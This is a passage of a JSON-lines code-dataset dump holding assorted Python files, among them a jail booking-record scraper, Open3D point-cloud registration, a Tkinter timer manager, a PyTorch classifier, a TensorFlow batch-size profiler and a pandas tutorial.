{'height': \"N/A\", 'weight': \"N/A\", 'sex': \"N/A\",\n\t\t\t'eyes': \"N/A\", 'hair': \"N/A\", 'race': \"N/A\", \n\t\t\t'age': \"N/A\", 'city': \"N/A\", 'state': \"N/A\", }\n\n\tfor tr in trs:\n\t\ttds = tr.find_all('td')\n\t\tkey = tds[0].text.lower().strip()\n\t\tvalue = tds[1].text.strip()\n\t\tdata[key] = value\n\t\n\n\tdetainee_info.create(\n\t\tdetainee_id = detainee_ID,\n\t\tname = detainee_name,\n\t\theight = data['height'],\n\t\tweight = data['weight'],\n\t\tsex = data['sex'],\n\t\teyes = data['eyes'],\n\t\thair = data['hair'],\n\t\trace = data['race'],\n\t\tage = data['age'],\n\t\tcity = data['city'],\n\t\tstate = data['state'],\n\t)\n \n\n#case number \ndef get_case_nums(div):\n\n\tcase_nums = div.find_all('td', attrs={\"data-th\": \"Case #\"})\n\n\treturn case_nums\n\t\n\n#extract charge table\n\ndef create_charge_table(div,element):\n\n\tdetainee_ID = div.get('id').lstrip('mugshot')\n\n\ttr = element.find_parent('tr')\n\n\tdata = {}\n\n\tfor td in tr.find_all('td'):\n\t\tkey = td.attrs['data-th'].lower().strip()\n\t\tvalue = td.text.strip()\n\t\tdata[key] = value\n\n\tcharge.create(\n\t\tdetainee_id= detainee_ID,\n\t\tcase_num= data['case #'],\n\t\tdescription= data['charge description'],\n\t\tstatus= data['charge status'],\n\t\tbail_amount= data['bail amount'],\n\t\tbond_type= data['bond type'],\n\t\tcourt_date= data['court date'],\n\t\tcourt_time= data['court time'],\n\t\tjurisdiction= data ['court of jurisdiction']\n\t\t)\n\n\n\ndef main():\n\tprint('executing scraper')\n\tdivs = soup.find_all('div', class_='mugshotDiv')\n\n\tfor div in divs:\n\t\tdetainee_ID = get_detainee_ids(div)\n\t\tname = get_detainee_names(div)\n\t\tcase_nums = get_case_nums(div)\n\n\t\tprint('checking %s information' % name)\n\n\t\ttry:\n\t\t\tdetainee_info.get(detainee_id=detainee_ID)\n\t\texcept DoesNotExist:\n\t\t\tcreate_info_table(div)\n\t\t\tprint('adding %s info' % name)\n\t\t\tprint('done')\n\t\telse:\n\t\t\tprint('%s already exists' % name)\n\n\t\tprint(\"checking %s charge_information\" %name)\n\t\tfor element in case_nums:\n\t\t\tcase_num = element.text.lower().strip()\n\t\t\ttry:\n\t\t\t\tcreate_charge_table(div, element)\n\t\t\t\tprint('adding Case# %s' % case_num)\n\t\t\texcept DoesNotExist:\n\t\t\t\tprint('%s already exists' % case_num)\n\t\tprint(\"finished with detainee %s\" % name)\n\t\tsleep(1.5)\n\n\tprint('HAHA!!Finally Ready To Go!!')\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"hctbg/jail","sub_path":"detainee.py","file_name":"detainee.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69818977402","text":"from PyQt4 import QtGui\nimport qimage2ndarray #http://kogs-www.informatik.uni-hamburg.de/~meine/software/qimage2ndarray/doc/#converting-ndarrays-into-qimages\nfrom PyQt4 import QtCore\nimport numpy as np\nimport dnfpy.view.plotArrayQt\nimport pyqtgraph as pg\nfrom scipy import signal\nfrom scipy import ndimage\nimport scipy as sp\nimport cv2\n\nfrom dnfpy.view.arrayView import ArrayView\n\n\nfrom scipy.interpolate import interpolate\n\ndef permute(a,b):\n xx,yy = np.meshgrid(a,b)\n size2 = len(a) * len(b)\n xx = xx.reshape(size2)\n yy = yy.reshape(size2)\n return (np.dstack((xx,yy))).reshape(len(a),len(b),2)\n\ndef interpolateArray(data,shape,kind='linear'):\n X,Y = np.meshgrid(np.arange(data.shape[0]),np.arange(data.shape[1]))\n outgrid = interpolate.interp2d(X,Y,data,kind=kind)\n xi = np.linspace(0,data.shape[0],shape[0])\n yi = 
np.linspace(0,data.shape[1],shape[1])\n z = outgrid(xi,yi)\n return z\n\n\n\nclass FhpMapView(ArrayView):\n triggerOnClick = QtCore.pyqtSignal(str,int,int)#Will be triggered on click\n triggerOnRClick = QtCore.pyqtSignal(str,int,int)#Will be triggered on click\n triggerOnParamChanged = QtCore.pyqtSignal()\n #map name coord x y\n def __init__(self, map, runner,mapView):\n super(FhpMapView, self).__init__(map,runner,mapView)\n #self.stateList.append(\"speed\")\n self.size =self.map.getArg('size')\n self.nbPoints = 50\n\n x = np.linspace(0,1,self.nbPoints)\n y = np.linspace(0,1,self.nbPoints)\n self.points = permute(x,y)\n \n\n\n def updateArray(self):\n super(FhpMapView,self).updateArray()\n if self.viewState == \"speed\":\n self.speedViewUpdate()\n\n def paintEvent(self, event):\n super(FhpMapView,self).paintEvent(event)\n if self.viewState == \"speed\":\n self.paintSpeed(event)\n\n\n def speedViewUpdate(self):\n self.speed = self.map.celerity(self.map.getData())\n speedX = self.speed[:,:,1]\n speedY = self.speed[:,:,0]\n\n #echantillone\n# downX = speedX[::self.step,::self.step]\n# downY = speedY[::self.step,::self.step]\n downX = cv2.resize(speedX,(self.nbPoints,self.nbPoints))\n downY = cv2.resize(speedY,(self.nbPoints,self.nbPoints))\n\n self.vectors = np.dstack((downX,downY))\n self.vectors = self.vectors\n\n\n\n def paintSpeed(self,event):\n qp = QtGui.QPainter(self)\n qp.setPen(QtGui.QColor(0,0,125))\n\n\n size = self.rect().size()\n sizeWH = np.array([size.width(), size.height()])\n pts = self.points * sizeWH\n #print self.vectors\n vects = self.vectors/self.nbPoints*sizeWH\n vect2 = pts + vects\n qtLines = []\n for i in range(vects.shape[0]):\n for j in range(vects.shape[1]):\n p = pts[j,i,:]\n v = vect2[j,i,:]\n qpt = QtCore.QPointF(p[0],p[1])\n qv = QtCore.QPointF(v[0],v[1])\n qtLines.append(QtCore.QLineF(qpt,qv))\n #print \"v : \",v\n\n qp.drawLines(qtLines)\n\n\n\n\n def paintArray(self,event):\n qp = QtGui.QPainter(self)\n if self.img:\n qp.drawImage(event.rect(), self.img)\n qp.setPen(QtGui.QColor(0,0,0))\n qp.drawText(event.rect(), QtCore.Qt.AlignTop, \"%.2f\" %\n self.max)\n qp.drawText(event.rect(), QtCore.Qt.AlignBottom, \"%.2f\" %\n self.min)\n\n","repo_name":"bchappet/dnfpy","sub_path":"src/dnfpy/view/fhpMapView.py","file_name":"fhpMapView.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16948071629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 26 12:17:14 2020\r\n\r\n@author: michaely\r\n\"\"\"\r\n\r\n\r\nimport os\r\n#import pandas as pd\r\nimport random\r\n\r\ndata_case_path = r\"C:\\Users\\michaely\\Documents\\hiwi\\kits19\\data\"\r\ncases_ = os.listdir(data_case_path)\r\n\r\n\r\ncases = []\r\ncase_list = []\r\ncase_pred_list = []\r\nimage_list = []\r\nsegmentation_list = []\r\n\r\n# removing the cases without segmentation\r\nfor c in cases_:\r\n ca = c.split(\"_\")\r\n if len(ca) ==2:\r\n num = int(ca[1])\r\n if num <= 209:\r\n cases.append(c)\r\n\r\n# Randomize the list \r\ncases = random.sample(cases, len(cases))\r\n\r\n\r\n# Adding data to case list and removing the case 37\r\nfor case in cases:\r\n if case[0] == 'c' and 'case_00037' not in case:\r\n case = data_case_path + '\\\\' + case\r\n case_list.append(case)\r\n\r\n\r\n\r\n \r\n# Get pred_case \r\nfor case in cases:\r\n if case[0] == 'c' and 'case_00037' not in case:\r\n case = 'pred_' + case + '.nii'\r\n case_pred_list.append(case)\r\n\r\n \r\n# Getting the new image and new 
segmentation file paths\r\nfor cases_ in case_list:\r\n case_temp = os.listdir(cases_)\r\n\r\n for content in case_temp:\r\n\r\n if content =='new_image.nii':\r\n content_path = cases_ + '\\\\' + content\r\n content_path = content_path.replace('\\\\','/')\r\n image_list.append(content_path)\r\n \r\n elif content == 'new_segmentation.nii':\r\n content_path = cases_ + '\\\\' + content\r\n content_path = content_path.replace('\\\\','/')\r\n segmentation_list.append(content_path)\r\n \r\n\r\n\r\n\r\n# Splitting the datasets into train, val and test\r\ntrain = 174\r\nval = 20\r\ntest = 10\r\ntotal = train + val + test\r\n\r\ntrain_set = {'image' : image_list[0:train:1],\r\n 'segmentation': segmentation_list[0:train:1]} \r\n\r\n\r\nval_set = {'image' : image_list[train:train+val:1],\r\n 'segmentation': segmentation_list[train:train+val:1]} \r\n\r\n\r\ntest_set = {'image' : image_list[train+val:total:1],\r\n 'segmentation': segmentation_list[train+val:total:1]} \r\n\r\n\r\n# Prediction val and test list\r\nval_pred_set = case_pred_list[train:train+val:1]\r\ntest_pred_set = case_pred_list[train+val:total:1]\r\n\r\n\r\n\r\n\r\n# _06062020Edition\r\n\r\n\r\n\r\n\r\n\r\n\r\n# image_paths_df = pd.DataFrame(image_list).to_csv(index=False)\r\n# image_paths_df = image_paths_df.iloc[:,0]\r\n# segmentation_paths_df = pd.DataFrame(segmentation_list)","repo_name":"youpele52/thesis","sub_path":"listofniifilepaths.py","file_name":"listofniifilepaths.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45121808061","text":"# examples/Python/Advanced/multiway_registration.py\n\nimport open3d as o3d\nimport numpy as np\n\nvoxel_size = 0.02\nmax_correspondence_distance_coarse = voxel_size * 15\nmax_correspondence_distance_fine = voxel_size * 1.5\n\n\ndef load_point_clouds(voxel_size=0.0):\n pcds = []\n for i in range(3):\n pcd = o3d.io.read_point_cloud(\"../../TestData/ICP/cloud_bin_%d.pcd\" % i)\n pcd_down = o3d.geometry.voxel_down_sample(pcd, voxel_size=voxel_size)\n pcds.append(pcd_down)\n return pcds\n\n\ndef pairwise_registration(source, target):\n print(\"Apply point-to-plane ICP\")\n icp_coarse = o3d.registration.registration_icp(\n source, target, max_correspondence_distance_coarse, np.identity(4),\n o3d.registration.TransformationEstimationPointToPlane())\n icp_fine = o3d.registration.registration_icp(\n source, target, max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.registration.TransformationEstimationPointToPlane())\n transformation_icp = icp_fine.transformation\n information_icp = o3d.registration.get_information_matrix_from_point_clouds(\n source, target, max_correspondence_distance_fine,\n icp_fine.transformation)\n return transformation_icp, information_icp\n\n\ndef full_registration(pcds, max_correspondence_distance_coarse,\n max_correspondence_distance_fine):\n pose_graph = o3d.registration.PoseGraph()\n odometry = np.identity(4)\n pose_graph.nodes.append(o3d.registration.PoseGraphNode(odometry))\n n_pcds = len(pcds)\n for source_id in range(n_pcds):\n for target_id in range(source_id + 1, n_pcds):\n transformation_icp, information_icp = pairwise_registration(\n pcds[source_id], pcds[target_id])\n print(\"Build o3d.registration.PoseGraph\")\n if target_id == source_id + 1: # odometry case\n odometry = np.dot(transformation_icp, odometry)\n pose_graph.nodes.append(\n o3d.registration.PoseGraphNode(np.linalg.inv(odometry)))\n pose_graph.edges.append(\n 
o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=False))\n else: # loop closure case\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=True))\n return pose_graph\n\n\nif __name__ == \"__main__\":\n\n o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Debug)\n pcds_down = load_point_clouds(voxel_size)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Full registration ...\")\n pose_graph = full_registration(pcds_down,\n max_correspondence_distance_coarse,\n max_correspondence_distance_fine)\n\n print(\"Optimizing PoseGraph ...\")\n option = o3d.registration.GlobalOptimizationOption(\n max_correspondence_distance=max_correspondence_distance_fine,\n edge_prune_threshold=0.25,\n reference_node=0)\n o3d.registration.global_optimization(\n pose_graph, o3d.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.registration.GlobalOptimizationConvergenceCriteria(), option)\n\n print(\"Transform points and display\")\n for point_id in range(len(pcds_down)):\n print(pose_graph.nodes[point_id].pose)\n pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Make a combined point cloud\")\n pcds = load_point_clouds(voxel_size)\n pcd_combined = o3d.geometry.PointCloud()\n for point_id in range(len(pcds)):\n pcds[point_id].transform(pose_graph.nodes[point_id].pose)\n pcd_combined += pcds[point_id]\n pcd_combined_down = o3d.geometry.voxel_down_sample(pcd_combined,\n voxel_size=voxel_size)\n o3d.io.write_point_cloud(\"multiway_registration.pcd\", pcd_combined_down)\n o3d.visualization.draw_geometries([pcd_combined_down])","repo_name":"nitthilan/volumetric_video","sub_path":"pre_processing/pose_refinement/open3d_sample.py","file_name":"open3d_sample.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"26592956254","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# GraphicTimerManager: handle dynamic and graphical behaviour of attached Timers \n# \n# \n# \nimport tkinter as tk\nimport tkinter.font\nimport tkinter.messagebox\nfrom TimerData import TimerData\nfrom Util import *\nfrom DragAndDropLabelsManager import DragAndDropLabelsManager\nfrom AbstractGraphicTimerManager import AbstractGraphicTimerManager\nimport logging\n\n\nclass GraphicAttachedTimersManager(tk.Toplevel, AbstractGraphicTimerManager):\n    # constructor\n    def __init__(self, mgr):\n        tk.Toplevel.__init__(self)\n        AbstractGraphicTimerManager.__init__(self, mgr)\n        self.labelNoActiveTimers = None\n    \n    # initialization\n    def init(self):\n        # main logger\n        self.logger = logging.getLogger(self.__class__.__name__)\n        self.logger.info('')\n        self.setTitle(self.mgr.cfg_file)\n        # (re)create Labels \n        nbActiveTimers = self.createLabelTimers()\n        # check if detached timers\n        if nbActiveTimers >=1:\n            # DragAndDrop Labels Management after update\n            dragAndDropTimerTool = DragAndDropLabelsManager(self)\n            dragAndDropTimerTool.init()\n        else:\n            self.labelNoActiveTimers = tk.Label(self, text = 'No active Timers...')\n            self.labelNoActiveTimers.grid(padx=50, pady=50)\n        # close the window with X\n        self.protocol(\"WM_DELETE_WINDOW\", lambda : self.closing_procedure(self.destroy))\n        self.bindGTimers()\n    \n    # bind all \n    def bindGTimers(self):\n        self.logger.info('') \n        # handle key binding \n        self.bind('<Key>', lambda event: self.processKeyPressed(event))\n    \n    # (re)create Labels\n    def createLabelTimers(self):\n        self.logger.info('')\n        # sort by position\n        listSortedTimerData = sorted(self.timerConf.TimerDataList, key=lambda TimerData: TimerData.timer_conf[ParamTimerCnf.Position])\n        # create the label for each powerup timer\n        index = 0\n        for timerData in listSortedTimerData: \n            if timerData.label != None:\n                timerData.label.destroy()\n                timerData.label = None\n            if timerData.isActive() == True:\n                fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n                \n                timerData.label = tk.Label(self, text = timerData.getStrTimerValue() , \n                                font = fontTimerLabel,\n                                foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB], \n                                bg=timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] , padx=int(self.timerConf.general_conf[ParamCnf.TimerFontSize]) / 5)\n                # vertical or horizontal Disposition\n                if int(self.timerConf.general_conf[ParamCnf.Disposition]) == TimerDisposition.VERTICAL.value:\n                    timerData.label.grid(row=index, column=0)\n                else: \n                    timerData.label.grid(row=0, column=index) \n                # position in the window\n                timerData.gposition = index\n                index += 1\n        return index \n    \n    # evaluate timers position\n    def evaluateTimerPosition(self):\n        self.logger.info('')\n        # sort by position\n        listSortedTimerData = sorted(self.timerConf.TimerDataList, key=lambda TimerData: TimerData.timer_conf[ParamTimerCnf.Position])\n        # create the label for each powerup timer\n        index = 0\n        for timerData in listSortedTimerData: \n            if timerData.isActive() == True:\n                if int(self.timerConf.general_conf[ParamCnf.Disposition]) == TimerDisposition.VERTICAL.value:\n                    timerData.label.grid(row=index, column=0)\n                else: \n                    timerData.label.grid(row=0, column=index) \n                index += 1\n    \n    #modify Disposition\n    def changeDisposition(self):\n        self.logger.info('')\n        if int(self.mgr.UTtimerConfig.general_conf[ParamCnf.Disposition]) != TimerDisposition.DETACHED.value:\n            self.evaluateTimerPosition() \n        else:\n            self.mgr.buildGTimers()\n    \n    #modify 
Font \n def changeFont(self): \n self.logger.info('')\n for timerData in self.timerConf.TimerDataList: \n if timerData.isActive() == True:\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n timerData.label.config(font = fontTimerLabel)\n \n #modify color timer text \n def changeFgColorTimer(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList: \n if timerData.isActive() == True and self.timerConf.general_conf[ParamCnf.ColorTimerRGB] != '':\n timerData.label.config( foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB])\n \n #modify color timer text \n def changeBgColorTimer(self, name):\n self.logger.info(' name=%s' % name)\n timerData = self.timerConf.getTimerDataFromName(name)\n if timerData.isActive() == True and timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] != '':\n timerData.label.config(bg=timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB])\n \n # modify timer value\n def changeValue(self, name):\n self.logger.info(' name=%s' % name)\n timerData = self.timerConf.getTimerDataFromName(name)\n if timerData.isActive() == True:\n timerData.label.config(text = timerData.getStrTimerValue())\n \n # clean\n def clean(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList:\n if timerData.timer != None and timerData.timer.is_alive():\n timerData.timer.cancel()\n if self.labelNoActiveTimers != None:\n self.labelNoActiveTimers.destroy()\n \n # return size of label\n def getLabelSize(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList:\n if timerData.label != None:\n return (timerData.label.winfo_width(), timerData.label.winfo_height()) \n return (490, 192) # default\n \n # return timer from gposition\n def getTimerDataFromGPosition(self, gposition):\n self.logger.info('gposition=%s' % gposition)\n for timerData in self.timerConf.TimerDataList:\n if timerData.isActive() and timerData.gposition == gposition:\n return timerData\n \n #on remove timer\n def removeTimer(self):\n self.logger.info('')\n # replace\n self.evaluateTimerPosition() \n\n # setTitle\n def setTitle(self, title):\n self.logger.info('title=%s' % title)\n self.title(title)\n \n # ask before closing application\n def closing_procedure(self, callback, *args, **kwargs):\n self.logger.info('args=%s kwargs=%s' % (args, kwargs))\n self.clean()\n self.mgr.onClosedGtimers()\n callback(*args, **kwargs)\n \n # call by DragAndDrop when drop\n def onDrop(self):\n if tk.messagebox.askyesno(\"Save configuration\", \"Timers position have changed. Do you want to save changes ? 
\", parent=self) == True:\n            if self.mgr.optionsEditorMgr == None:\n                self.timerConf.saveTimersInformation()\n                self.timerConf.saveConfiguration()\n            else:\n                self.mgr.optionsEditorMgr.saveConfigurationChanges(self.mgr.cfg_file)\n","repo_name":"Danube31/UTTimer","sub_path":"source/GraphicAttachedTimersManager.py","file_name":"GraphicAttachedTimersManager.py","file_ext":"py","file_size_in_byte":7865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70655722680","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import UserView, LoginView, LogoutView\n\nrouter = DefaultRouter()\nrouter.register(r\"accounts\", UserView)\n\nurlpatterns = [\n    path(\"\", include(router.urls)),\n    path(\"login/\", LoginView.as_view(), name=\"login\"),\n    path(\"logout/\", LogoutView.as_view(), name=\"logout\")\n    \n]\n","repo_name":"rakib60/wizdoor-app","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22699162422","text":"#!/usr/bin/env python\nfrom argparse import ArgumentParser\nfrom boids_code.mkgraph import make_graph\n\ndef load_boids():\n    parser = ArgumentParser(description = 'Visualize boids flying around')\n    parser.add_argument('--number', help='Number of boids', dest='number', type=int)\n    parser.add_argument('--speed', help='slow or fast', dest='speed', type=str)\n    parser.add_argument('--out', help='Type mp4 or gif to save the animation', dest='out', type=str)\n    arguments = parser.parse_args()\n\n    make_graph(arguments.number, arguments.speed, arguments.out)\n\nif __name__ == \"__main__\":\n    load_boids()\n","repo_name":"dgvisnadi/boids","sub_path":"boids_code/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26685371137","text":"def solution(brown, yellow):\n    answer = []\n    size = brown + yellow\n    # find the width x and height y of the whole rectangle\n    for x in range(1, size+1):\n        # skip if the area is not divisible by x\n        if size % x != 0:\n            continue\n        y = size // x\n        print(x, y)\n        # exclude cases where the height is larger than the width\n        if y > x:\n            continue\n        if yellow == size -(2*x) -(2*y) + 4:\n            answer = [x, y]\n    \n    return answer","repo_name":"kkkapuq/algo_study","sub_path":"프로그래머스/lv2/42842. 
카펫/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18849565383","text":"import torch\n\n\nclass ANNClassifier(torch.nn.Module):\n    def __init__(self, input_size, output_size, layer_sizes=(), activation=None, dropout=0.0):\n        \"\"\"Network initialization\n\n        Args:\n            input_size: number of features in an observation\n            output_size: number of classes in a prediction\n        \"\"\"\n\n        super().__init__()\n        self.input_size = input_size\n        self.output_size = output_size\n        self.layer_sizes = layer_sizes\n        self.activation = activation or torch.nn.Sigmoid()\n\n        sizes = [input_size, *layer_sizes, output_size]\n        lower, upper = iter(sizes), iter(sizes)\n        next(upper)\n\n        # torch can't find parameters inside lists\n        self.layers = torch.nn.ModuleList(torch.nn.Linear(*window) for window in zip(lower, upper))\n        self.dropout = torch.nn.Dropout(dropout)\n\n        # activation transforms features to probability vector\n        self.activation_final = torch.nn.Sigmoid()\n\n    def forward(self, data):\n        \"\"\"Given an observation, return the network prediction\n\n        Args:\n            data: a matrix of dimension [batch_size, input_features]\n                batch_size: number of observations\n                input_features: number of features for each observation\n        Return:\n            torch.tensor: the output of the network\n        \"\"\"\n\n        # make sure data type is correct\n        data = data.float()\n\n        for layer in self.layers[:-1]:\n            data = self.dropout(self.activation(layer(data)))\n\n        # print(self.layers[1].weight)\n\n        # apply the final activation once to the last layer's output\n        return self.activation_final(self.layers[-1](data))\n","repo_name":"ICEWS-ML/Models","sub_path":"models/torch_ann/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26329177473","text":"import math\nfrom time import time\nfrom typing import Optional, Tuple\n\nimport tensorflow as tf\n\nfrom tfimm.models import registry\nfrom tfimm.models.factory import create_model\nfrom tfimm.utils import to_2tuple\n\n\ndef _below_resolution(\n    lower: int,\n    upper: int,\n    resolution_abs: int,\n    resolution_rel: Optional[float],\n):\n    \"\"\"We check if (upper - lower) <= resolution.\"\"\"\n    if resolution_rel is not None:\n        if abs(upper - lower) <= upper * resolution_rel:\n            return True\n\n    # Absolute resolution is always at least 1\n    if abs(upper - lower) <= resolution_abs:\n        return True\n\n    return False\n\n\ndef _time_function(fun, img, nb_batches, verbose):\n    \"\"\"Helper function to time the execution of `fun(img)`.\"\"\"\n    # We ignore the first run because graph compilation takes time. And some memory.\n    fun(img)\n\n    # Now we start counting batches\n    start = time()\n    for j in range(nb_batches):\n        fun(img)\n        if verbose:\n            print(f\"Batch {j}: {(time() - start) / (j + 1):.3f}sec.\")\n    duration = time() - start\n    return duration\n\n\ndef time_model(\n    model_name,\n    target,\n    input_size,\n    nb_classes,\n    batch_size,\n    float_policy,\n    nb_batches,\n    verbose=False,\n):\n    \"\"\"\n    Time backpropagation speed of model. 
The loss is simply the mean of all model\n outputs.\n\n Args:\n model_name: Model to be timed, will be created using `create_model`.\n target: One of \"inference\" or \"backprop\"\n input_size: Model input size\n nb_classes: Number of classes\n batch_size: Batch size to be used for testing.\n float_policy: Can be \"float32\" or \"mixed_float16\"\n nb_batches: Backpropagation time is averages over `nb_batches` calls.\n verbose: If `True`, we print duration of each batch\n\n Returns:\n Backpropagation throughput in img/sec.\n \"\"\"\n assert float_policy in {\"float32\", \"mixed_float16\"}\n\n tf.keras.backend.clear_session() # Release GPU memory\n # Need to set policy before creating model\n tf.keras.mixed_precision.set_global_policy(float_policy)\n dtype = \"float32\" if float_policy == \"float32\" else \"float16\"\n\n input_size = to_2tuple(input_size) if input_size is not None else input_size\n model = create_model(model_name, input_size=input_size, nb_classes=nb_classes)\n img = tf.ones(\n (batch_size, *model.cfg.input_size, model.cfg.in_channels),\n dtype=dtype,\n )\n\n if target == \"inference\":\n\n @tf.function(experimental_relax_shapes=True, jit_compile=True)\n def _fun(x):\n return model(x, training=False)\n\n elif target == \"backprop\":\n optimizer = tf.optimizers.SGD(learning_rate=0.0001)\n\n @tf.function(experimental_relax_shapes=True)\n def _fun(x):\n with tf.GradientTape() as tape:\n output = model(x, training=True)\n # The loss is always computed in float32 in order to not lose precision\n # Here we simulate it to make profiling more accurate\n output = tf.cast(output, \"float32\")\n loss = tf.reduce_mean(output)\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n else:\n raise ValueError(f\"Unknown target: {target}.\")\n\n duration = _time_function(_fun, img, nb_batches, verbose)\n img_per_sec = batch_size * nb_batches / duration\n return img_per_sec\n\n\ndef find_max_batch_size(\n model_name: str,\n target: str = \"inference\",\n input_size: Optional[int] = None,\n nb_classes: Optional[int] = None,\n float_policy: str = \"float32\",\n nb_batches: int = 3,\n start_batch_size: int = 256,\n resolution_abs: int = 1,\n resolution_rel: Optional[float] = 0.1,\n verbose: bool = False,\n) -> Tuple[int, float]:\n \"\"\"\n Searches for largest batch size that fits in memory.\n\n Args:\n model_name: Model to validate\n target: Can be \"inference\" or \"backprop\"\n float_policy: Can be \"float32\" or \"mixed_float16\"\n nb_batches: For how many batches to run the test\n start_batch_size: First batch size to try\n resolution_abs: We stop, if upper-lower <= resolution_abs\n resolution_rel: We stop, if (upper-lower) <= upper * resolution_rel\n verbose: If True, we print information about search progress\n Returns:\n Maximum batch size that does not lead to OOM errors.\n Inference time in img/sec with that batch size\n \"\"\"\n upper_limit = None\n lower_limit = 0\n\n # Find hard batch size cap depending on model input size. 
The whole batch should\n # be <0.5 GB of memory.\n cfg = registry.model_config(model_name)\n img_size = 4 * cfg.input_size[0] * cfg.input_size[1] * cfg.in_channels\n max_memory = 5 * 10**8\n # We want max batch size to be a power of 2\n max_batch_size = 2 ** math.floor(math.log2(max_memory / img_size))\n\n continue_search = True\n next_batch_size = min(start_batch_size, max_batch_size)\n img_per_sec = 0.0\n while continue_search:\n batch_size = next_batch_size\n if verbose:\n print(f\"Trying: {batch_size}. Range: ({lower_limit}, {upper_limit})\")\n try:\n img_per_sec = time_model(\n model_name=model_name,\n target=target,\n input_size=input_size,\n nb_classes=nb_classes,\n batch_size=batch_size,\n float_policy=float_policy,\n nb_batches=nb_batches,\n )\n success = True\n lower_limit = batch_size\n\n if batch_size >= max_batch_size:\n continue_search = False\n elif upper_limit is None:\n next_batch_size = 2 * batch_size\n next_batch_size = min(next_batch_size, max_batch_size)\n elif _below_resolution(\n lower_limit, upper_limit, resolution_abs, resolution_rel\n ):\n continue_search = False\n else:\n next_batch_size = (upper_limit + batch_size) // 2\n\n except (\n tf.errors.InternalError,\n # The next one catches creating models with invalid parameters\n tf.errors.InvalidArgumentError,\n tf.errors.ResourceExhaustedError,\n tf.errors.UnknownError,\n ):\n success = False\n upper_limit = batch_size\n if _below_resolution(\n lower_limit, upper_limit, resolution_abs, resolution_rel\n ):\n continue_search = False\n else:\n next_batch_size = (batch_size + lower_limit) // 2\n\n finally:\n if verbose:\n print(f\"Batch size {batch_size}: {'valid' if success else 'oom'}\")\n\n return lower_limit, img_per_sec\n","repo_name":"martinsbruveris/tensorflow-image-models","sub_path":"tfimm/utils/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"40"} +{"seq_id":"31487688259","text":"import numpy as np \nimport pandas as pd\n\nseries = pd.Series(data=[78,92,35,64,89])\nprint(series)\nprint(series.values,series.index)\nprint(series[1])\nprint(series[1:3])\ndata = pd.Series(data=[700000,800000,1600000,1800000,200000],index = ['Swift','Jazz','Civic','Altis','Gallardo'])\nprint(data)\nprint(data['Swift'])\nprint(data['Jazz': 'Gallardo'])\n\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\nprint(car_price)\n\n#Creating a car price series with a dictionary\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\n# Creating the car manufacturer series with a dictionary\ncar_man_dict = {'Swift' : 'Maruti',\n 'Jazz' : 'Honda',\n 'Civic' : 'Honda',\n 'Altis' : 'Toyota',\n 'Gallardo' : 'Lamborghini'}\ncar_man = pd.Series(car_man_dict)\nprint(car_price)\nprint(car_man)\n\ncars = 